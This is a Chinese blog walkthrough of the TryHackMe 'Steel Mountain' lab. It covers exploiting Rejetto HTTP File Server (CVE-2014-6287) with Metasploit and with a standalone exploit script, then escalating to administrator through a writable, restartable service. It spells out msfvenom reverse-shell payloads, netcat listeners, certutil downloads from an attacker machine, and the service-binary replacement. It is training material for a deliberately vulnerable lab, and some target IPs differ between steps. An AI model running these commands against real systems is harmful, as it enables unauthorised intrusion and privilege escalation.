TryHackme-Steel Mountain房间练习
(侵入以机器人先生为主题的 Windows 机器,使用metasploit进行初始访问,利用powershell进行Windows权限升级枚举,并学习一种新技术来获得管理员访问权限。)
攻击IP:10.10.220.142
本地IP:10.10.200.217
1.扫描机器
端口:nmap -sV -sC -oN nmap.out -p- 10.10.211.141
这提供了版本扫描,运行一些基本脚本,扫描所有端口,并将输出写入名为 nmap.out 的文件。
房间问题
(使用 nmap 扫描机器。 运行 Web 服务器的另一个端口是什么? 查看扫描结果,我们发现端口 8080 上打开了另一个 HTTP 服务
看一下其他的Web服务器,什么文件服务器正在运行? 当打开新页面时,我们发现它是HttpFileServer 2.3。
然而,如果你把这个放在谷歌中我们会看到正确的答案Rejetto HTTP File Server
查找漏洞:searchsploit rejetto http file server 或 searchsploit http file server -w(可以使用 searchsploit 命令或查看exploitdb 的网站,使用 -w 标志来获取exploit-db 的链接)
利用该文件服务器的CVE编号是多少? 访问 https://www.exploit-db.com/ 并在搜索框中输入rejetto http file server ,CVE 2014-6287)
2.运行漏洞利用代码
使用 Metasploit 获取初始 shell,启动msfconsole,search 2014-6287,use 0,show options,set RHOSTS 10.10.211.141,set RPORT 8080,run运行
找到flag,使用以下命令来搜索所有txt文件:meterpreter>search -f *.txt,查看文件meterpreter>cat c:/Users/bill/Desketop/user.txt
3.权限提升
为了枚举这台机器,我们将使用一个名为 PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - PowerUp 的目标是 成为依赖错误配置的常见 Windows 权限升级向量的交换所。 下载脚本 https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1。
现在可以使用 Metasploit 中的upload 命令上传脚本,要使用 Meterpreter 执行此操作,我将在 meterpreter 中输入 load powershell:meterpreter > upload /root/PowerSploit-master/Privesc/PowerUp.ps1,然后将通过输入 powershell_shell 来进入 powershell : load powershell,powershell_shell
输入以下命令来运行 PowerUp Powershell 脚本: . .\PowerUp.ps1,然后Invoke-AllChecks,这给出了一个很长的异常列表。
注意设置为 true 的 CanRestart 选项,服务路径漏洞的服务名称是什么? AdvancedSystemCareService9。
路径Path:C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
CanRestart 选项为 true,允许我们重新启动系统上的服务,应用程序的目录也是可写的。 这意味着我们可以用恶意应用程序替换合法应用程序,重新启动服务,这将运行我们受感染的程序。
使用 msfvenom 生成反向 shell 作为 Windows 可执行文件:msfvenom -p windows/shell_reverse_tcp LHOST=<攻击者 IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe,
现在我们到路径 :meterpreter > cd 'C:\Program Files (x86)\IObit\',dir,
使用与之前相同的上传命令:upload /root/Desktop/Advanced.exe,
现在我们需要在创建 exe 文件时定义的端口上有一个侦听器在新终端中输入以下命令:nc -nlvp 4443,然后meterpreter >shell,sc stop AdvancedSystemCareService9,sc start AdvancedSystemCareService9
4.无需 Metasploit 的访问和升级
现在让我们在不使用 Metasploit 的情况下完成这个房间,为此,我们将利用 powershell 和 winPEAS 枚举系统并收集相关信息以升级
准备:可以将所有文件放入root/Downloads/Share 目录中,下载漏洞https://www.exploit-db.com/exploits/39161,可以把漏洞文件改名为exploit.py,编辑脚本中的端口/ip,将 PowerShell PowerUp 文件下载到同一目录中:wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1,
创建或复制新的Advanced.exe:msfvenom -p windows/shell_reverse_tcp LHOST=10.9.135.33 LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe,下载 ncat.exe 文件并将其重命名为 nc.exe:https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe,下载WinPease:wget https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/a17f91745cafc5fa43a428d766294190c0ff70a1/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe
现在让我们开始利用,在当前Share目录中,我们将启动一个 HTTP 服务器,因为该漏洞需要 nc.exe 文件,输入以下命令:python3 -m http.server 8000(默认情况下,有效负载脚本使用文件 Web 服务器的端口 80。 此端口经常在 THM AttackBoxes 上使用,因此我们不能将其用于第 5 步中运行的 Web 服务器。因此,我们将端口 8000 添加到 ip_addr 变量,ip_addr+":8000"+),
启动监听器,输入 nc -lvnp 443 启动简单的 netcat 侦听器,
使用正确的参数运行漏洞利用程序,运行此命令: python2 exploit.py 10.10.13.114 8080,如果不使用 python3 进行编辑,该脚本将无法运行。
如果一切正确,将打开 3 个终端选项卡。 一种运行漏洞利用程序,一种运行 python http 服务器,一种运行 netcat 侦听器。
现在已经进入系统了,我们可以使用 certutil 通过 http 下载文件,导航到 c:\Users\bill\desktop 并下载 winpeas 文件:certutil.exe -urlcache -split -f http://Yourmachine_ip/winPEASx86.exe,可以运行 winpeas来查看它是否也会找到未引用的服务或执行我们之前所做的利用。 只需将advanced.exe 下载到正确的目录即可。 启动一个监听器。停止并启动服务,然后会弹出一个shell
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
